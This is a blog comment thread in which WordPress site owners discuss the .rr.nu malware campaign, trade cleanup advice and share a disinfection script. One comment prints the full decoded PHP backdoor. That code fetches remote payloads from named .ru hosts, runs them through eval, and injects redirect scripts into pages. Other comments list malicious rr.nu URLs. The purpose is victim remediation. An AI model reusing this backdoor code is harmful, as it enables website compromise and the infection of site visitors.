Malware Campaign from .rr.nu

62 comments

1. Just found this while testing some css on a wordpress install that has been sitting around for a while. Any idea what the likely attack vector was? thought I was running at least a vaguely tight ship. 

   1. Same here – has anyone identified what and why?

   2.  I’m in the same boat, trying to remove some outdated files now and might try Walker’s script.

2. My wordpress blog got compromised by this campaign, seemingly via an outdated version of the wp-spamfree plugin (which I can’t even remember installing but it’s possible I did). I manually removed the plugin and upgraded WP to the latest version and that seems to have done the trick.

3. I’ve got this, as well as a nice chunk of base64-decode code at the beginning of all my php files. I’ve removed that all and upgraded WordPress. I am still getting the redirect script in my footer though. Strangely, it only works in IE. Chrome doesn’t load it.

4. Just found the source of mine. It was the Open Web Analytics (OWA) plugin files.

5. I found two of my sites with this. This is the first time I’ve been hacked. How do I fix it?

   1. Couple links that might be of use:

      http://codex.wordpress.org/FAQ_My_site_was_hacked

      https://blog.sucuri.net/2010/02/removing-malware-from-a-wordpress-blog-case-study.html — see section 3, cleaning up WordPress.

      What I’ve done so far is basically what they recommend:
      – Back up database
      – Back up files
      – Change MySQL user password
      – Reinstall WordPress (I did this manually but you may be able to do this via the admin panel)
      – Fix/reinstall theme, plugins, etc

      Quite a pain…

      1. Thanks, Dave.
         I’ll give it a try.

      2. I have actually done this, and two days after my theme files were infected again (I changed the FTP password as well).

         Anyone knows how they are getting in? I don’t want to keep cleaning my site when I don’t know how to close the hole they get in through.

         Seems like we’re all on Dreamhost, so maybe it’s something on their network. This will make it really hard for us to fix ourselfs.

6. JBXM, thanks for the tip about the base64-decode prefix on all the php files. I had the same issue. I did a clean install and now my site passes the Sucuri site checker: http://sitecheck.sucuri.net/

7. finishing a php code to clean all infected php files, tested. will take more tests, and will share on github near..

8. Result of script rrnuVaccine:

   1st wp site  : free(386) | disinfected(321) | total(707)

   2nd wp site: free(4) | disinfected(582) | total(586)

   who interests: https://github.com/walkeralencar/rrnuVaccine

   1. The script works great!!! Thanks a lot!

   2. It looks like it worked for me too.  Thanks!

      1. strange this doesnt work for me. I still have infected files. manually removing them is the only cure

         1. new release: v0.2 beta. Bow based on regex search engine, catch more variations. http://t.co/vYdLHJuQ

   3.  It came back.. and this time it’s not working for me at all.  Any suggestions?  I have many sites and 10s of thousands of files that are infected.

   4.  I installed rrnuVaccine.php on our web site and ran it.  All it did was take my browser to your web site.  Am I missing something?

      Thanks

      Regards,
      Doug

      1. I was also getting redirected to sucuri. it appeared that i had just rightclicked on rrnuVaccine.php and clicked on Save and uploaded to the site. In fact, we have to copy the actual code and save it in notepad to rrnuVaccine.php file then upload. Hope it helps other noobs like me.

   5. Script works great !! Awesome job saved my site Thanks

9. My Joomla websites were hacked. Walker’s script did not do the trick for cleaning up the files.  Any mod’s that would allow this script to work for me? 

   1. Anything guys?

      1. hi Alaina, i have detected anothers variety string, and iḿ adjust code to search more strings…

         You can update rrnuVaccine.php on line 125 with ur “infected string”, it appear on begin of files: at same line.

         share with me one infected file by pastebin and i will add string in next version ok?

         1.  I can’t believe I didn’t try this.  It worked for me on my 2nd hacked sites.  Is there a way to make it go down one directory?  for example right now i copy it to my /home/user/website directory but i have many sites so is there a way it can start scanning at /home/user/ ?  I am not too familiar with PHP.

            1. try new release on github… forgot strings… itś regex based now!

            2. I found the backdoor r.php and rr.php buried deep within my wp-content/uploads directory, multiple instances too. Found it running the file, comes up clean but if you look at the code, you will recognize it. Script works great cleaning site.

   2. Did it give you any errors or did it just not run?  There is a specific string it is looking for that exists at the top of each of your infected pages, something like “eval(base64_decode…[bunch of characters]”  

      This string is specified near the bottom of Walker’s script.  I’m speculating, but it may be possible that you have a different variety of the malware with a different string signature.  See if you can find an example infected page and compare the strings.  This tool was helpful in identifying infected pages.  http://sitecheck.sucuri.net/scanner/

10. Have you any text to include for the robots.txt on our websites? Is there any type of robotics they are using that we can phase out? I put a robots text on my desktop and it seems to function, even for others.

11. I also got this, from a domain that is not on your list — ingg93rant dot rr dot nu.

12. Is there any way of telling what their mode of operation is……how or where they found the vulnerabilty that allowed them to get in to your website and what options are available to secure your site better after an attack?

13. One of my sites was affected.  I noticed some entries in my information_schema MySQL database.

    How do I remove them?  Is information_schema a standard part of all WordPress MySQL installs?  If so, is it modified by specific themes?

    SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE ‘%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%’
    OR `USER` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `HOST` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `DB` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `COMMAND` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `TIME` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `STATE` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `INFO` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’)
    LIMIT 0 , 30

    EXPLAIN SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE ‘%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%’
    OR `USER` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `HOST` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `DB` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `COMMAND` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `TIME` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `STATE` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `INFO` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’)

14. Hi all,
    One of my WP installs was affected by malware from .rr.nu.
    Here is the code (from pastebin):
    http://pastebin.com/wKkNk7n6
    How can I clean information_schema? Do themes affect this DB?

15. Any updates on the vector? Having quite a few people reporting this issue.

16. Seems like everyone I’ve spoken to who has been affected by this is on DreamHost. Not sure yet whether it’s just a coincidence… 

    1. I’m on dream host too..

       1.  i’m on dreamhost too.

    2. I’m also on DreamHost.  I contacted them about it and they sent me a list of all of the files that they showed as being infected.  Only the WordPress databases were affected for me.  I have a few other directories and those files were unaffected.

       1. All of my .PHP files were (are infected). It seems to come back every day now. I’m assuming my databases are infected too, how did you clean the DBs? The dream host guy gave me a SSH shell command to run which will apparently remove the bad code, I’ll see if that works but the cause will obviously still be there.

17. Walker de Alencar, you are a badass!

    So I am a security idiot… for others like me that get screwed by this – here is the explanation /  answer I have figured so far.

    1. Your site gets a malware notice, especially in IE, I am on a mac and did not get it. 

    2. When you view source your page, just before the closing body tag you see a script directing to an rr.nu domain. Such as

    But when you look at the actual code on the server page (not your local files obviously) you do not see it, but wait… there is now a ton of junk code at the top in a PHP line.

    3. This code is a base64 string and will resemble:

    4. When this is decoded, it really reads as: 

    if(function_exists(‘ob_start’)&&!isset($_SERVER[‘mr_no’])){  $_SERVER[‘mr_no’]=1;    if(!function_exists(‘mrobh’)){    function get_tds_777($url){$content=””;$content=@trycurl_777($url);if($content!==false)return $content;$content=@tryfile_777($url);if($content!==false)return $content;$content=@tryfopen_777($url);if($content!==false)return $content;$content=@tryfsockopen_777($url);if($content!==false)return $content;$content=@trysocket_777($url);if($content!==false)return $content;return ”;}  function trycurl_777($url){if(function_exists(‘curl_init’)===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result==””)return false;return $result;}  function tryfile_777($url){if(function_exists(‘file’)===false)return false;$inc=@file($url);$buf=@implode(”,$inc);if ($buf==””)return false;return $buf;}  function tryfopen_777($url){if(function_exists(‘fopen’)===false)return false;$buf=”;$f=@fopen($url,’r’);if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf==””)return false;return $buf;}  function tryfsockopen_777($url){if(function_exists(‘fsockopen’)===false)return false;$p=@parse_url($url);$host=$p[‘host’];$uri=$p[‘path’].’?’.$p[‘query’];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request =”GET $uri HTTP/1.0n”;$request.=”Host: $hostnn”;fwrite($f,$request);$buf=”;while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf==””)return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function trysocket_777($url){if(function_exists(‘socket_create’)===false)return false;$p=@parse_url($url);$host=$p[‘host’];$uri=$p[‘path’].’?’.$p[‘query’];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request =”GET $uri HTTP/1.0n”;$request.=”Host: $hostnn”;socket_write($sock,$request);$buf=”;while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf==””)return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function update_tds_file_777($tdsfile){$actual1=$_SERVER[‘s_a1’];$actual2=$_SERVER[‘s_a2’];$val=get_tds_777($actual1);if ($val==””)$val=get_tds_777($actual2);$f=@fopen($tdsfile,”w”);if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,”|||CODE|||”)){list($val,$code)=explode(“|||CODE|||”,$val);eval(base64_decode($code));}return $val;}  function get_actual_tds_777(){$defaultdomain=$_SERVER[‘s_d1’];$dir=$_SERVER[‘s_p1’];$tdsfile=$dir.”log1.txt”;if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER[‘s_t1’]){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode(“n”,$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;}  function is_mac_777($ua){$mac=0;if (stristr($ua,”mac”)||stristr($ua,”safari”))if ((!stristr($ua,”windows”))&&(!stristr($ua,”iphone”)))$mac=1;return $mac;}  function is_msie_777($ua){$msie=0;if (stristr($ua,”MSIE 6″)||stristr($ua,”MSIE 7″)||stristr($ua,”MSIE 8″)||stristr($ua,”MSIE 9″))$msie=1;return $msie;}    function setup_globals_777(){$rz=$_SERVER[“DOCUMENT_ROOT”].”/.logs/”;$mz=”/tmp/”;if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER[“SCRIPT_FILENAME”].”/.logs/”;if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER[‘HTTP_USER_AGENT’];if (stristr($ua,”msnbot”)||stristr($ua,”Yahoo”))$bot=1;if (stristr($ua,”bingbot”)||stristr($ua,”google”))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1;  global $_SERVER;    $_SERVER[‘s_p1’]=$mz;  $_SERVER[‘s_b1’]=$bot;  $_SERVER[‘s_t1’]=1200;  $_SERVER[‘s_d1′]=”http://sweepstakesandcontestsdo.com/”;  $d=’?d=’.urlencode($_SERVER[“HTTP_HOST”]).”&p=”.urlencode($_SERVER[“PHP_SELF”]).”&a=”.urlencode($_SERVER[“HTTP_USER_AGENT”]);  $_SERVER[‘s_a1′]=’http://www.mrsmtihinfo.ru/g_load.php’.$d;  $_SERVER[‘s_a2′]=’http://www.cooperjsutf8.ru/g_load.php’.$d;  $_SERVER[‘s_script’]=”nl.php?p=d”;  }      setup_globals_777();    if(!function_exists(‘gml_777’)){  function gml_777(){    $r_string_777=”;  if ($_SERVER[‘s_b1’]==0)$r_string_777=”;  return $r_string_777;  }  }      if(!function_exists(‘gzdecodeit’)){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));  $start=10;  $v=0;  if($t&4){  $str=@unpack(‘v’,substr($decode,10,2));  $str=$str[1];  $start+=2+$str;  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&2){  $start+=2;  }  $ret=@gzinflate(@substr($decode,$start));  if($ret===FALSE){  $ret=$decode;  }  return $ret;  }  }  function mrobh($content){  @Header(‘Content-Encoding: none’);  $decoded_content=gzdecodeit($content);  if(preg_match(‘/</body/si',$decoded_content)){  return preg_replace('/(]*>)/si’,gml_777().”n”.’$1′,$decoded_content);  }else{  return $decoded_content.gml_777();  }  }  ob_start(‘mrobh’);  }  }

    5. I have not done much investigating into these sites, but the script redirects to random urls all pointing to an IP address 194.28.114.103 in F’ing Maldova (I had to look it up, a country between Ukraine and Romania) So when this code that is inserted into all php and html pages is inserted and decoded, it appears http://sweepstakesandcontestsdo.com , http://www.mrsmtihinfo.ru , http://www.cooperjsutf8.ru are the culprits. I hope someone can do something about these jack asses. 

    6. I am running a current and totally updated version of WordPress when it was hacked.
    a) deactivate all plugins, and update them
    b) update wordpress network
    c) update theme if valid
    d) in general, strip everything down as much as possible and update what you can
    e) check your .htacess file, go get it from your remote server and remove the junk and check your permissions are 644, you can do this through Cpanel.
    f) change your ftp user password, AND be sure to change your connection method on whatever FTP client you use to “SFPT”
    g) check your wordpress admin users to make sure you are aware of all admin account, change passwords

    7) go to https://github.com/walkeralencar/rrnuVaccine and copy the php code from Walker’s script into a new PHP file, 

    NOTE: before uploading, and this is the key to make it work for you as the base64 junk in your page will be likely be slightly different from various mutations of this malware bull… “Get” a copy of an infected page and copy all the code from:

    and replace your garbage code over Walker’s script code (begin on line 125)

    8. Save and upload it on the root of your site (where the wp-config file is) and run it through the browser. I had over 2,000 files disinfected. Go to http://sitecheck.sucuri.net/scanner/ and scan your URL (if you have done this prior, you will see cached results, even if you hit the browser refresh button) be sure to hit the “rescan” button at the bottom of the site. I am all clear now!

    9. Not yet where the actual vulnerability is and I expect this to come back, but at least I can clean it now in moments, thanks to Walker, as I keep figuring it out. On to further investigate and search “Harden WordPress”… I’ll update with more as I learn. 

    1. ok so code snippets were stripped out in my reply, if you need them, just holler for details.

       1.  i was working have 3 days, but have only 2h/day to work with this.

    2. now it’s easy, check new v0.2 beta, regex based, forget strings…

18. we have been infected by malware from http://ustreamtvonline.rr.nu/

19. I’m trying to use Walker’s script, but it returns this when I try to run it:

    Warning: Unexpected character in input: ” (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 8

    Warning: Unexpected character in input: ” (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 14

    Parse error: syntax error, unexpected T_CLASS in /blog/rrnuVaccine.php on line 15

    Any ideas on how to make it work?

    1. wtf php version are using?

       required php 5.1+

20. rrnu Vaccine v0.2 beta on github: http://t.co/vYdLHJuQ

    Regex based, now detect more variants.

21. Here is another: http://ustreamtvonline.rr.nu

22. Hi, today I’ve found inside my wp site (hosted on site5, London server) a directory called “.logs” and there a txt files with a list of rr.nu subdomains. What does it mean?

    1. It means that you’re f… just like the rest of us :(.

       I’ve blogged about this and how you get out trouble again:
       http://my4hours.com/hackers-got-my-ass-and-how-you-can-prevent-it-from-happening-to-you

       1. But if I run https://github.com/walkeralencar/rrnuVaccine and then I delete that directory, am I ok?
          I found the infection started from a wordpress plugin, eshop-languages. Sigh!

          1. Perhaps… The problem is that it can be hard to identify yourself if your not a tech wiz. Even though I have a long background with computers, I still ended up buying one of Sucuri’s packages (and everything was dandy fine an hour later)

             1.  now are easy, dont need identify infection string. v0.2 beta are Regex based.

                Only put on root dir, and run script 😉

23. I don’t know what we would have done without Sucuri.  All sites are now stable, I have a few of our staging sites that continue to get infected.  After 2 long years of dealing with this, Sucuri.net has literally saved dozens of our clients’ sites.  YOU GUYS ARE THE BEST.

    Cherie Young

24. Hi, I wrote a pretty lengthy and thorough piece on my fix for this hack.  It’s posted here:

    http://domesticenthusiast.blogspot.com/

    simon

    1. I have just encountered a pretty stubborn bit of this hacking and was looking. around for things to help. Your article was very informative, thanks.

25. Pingback: Malware: an apology « Better Nation
26. Pingback: Latest Mass Compromise of WordPress sites – More Details | Sucuri
27. Pingback: Web Malware Trends and the Mac Flashfake / Flashback Outbreak | Sucuri

28. Here’s another URL used by the malware: meant86lakefo.rr.nu

29. How can I remove it. I looked into my footer.php and source code and I can’t find it. But, when I scanned my site using sucuri.net, you were able to detect it, but don’t show where it’s located exactly. 🙁

30. Pingback: How to remove the rr.nu malware | Financial Jerk

Comments are closed.